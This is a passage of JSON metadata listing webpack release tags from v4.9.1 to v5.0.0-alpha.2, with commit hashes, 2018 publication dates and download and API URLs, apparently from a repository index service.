v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":n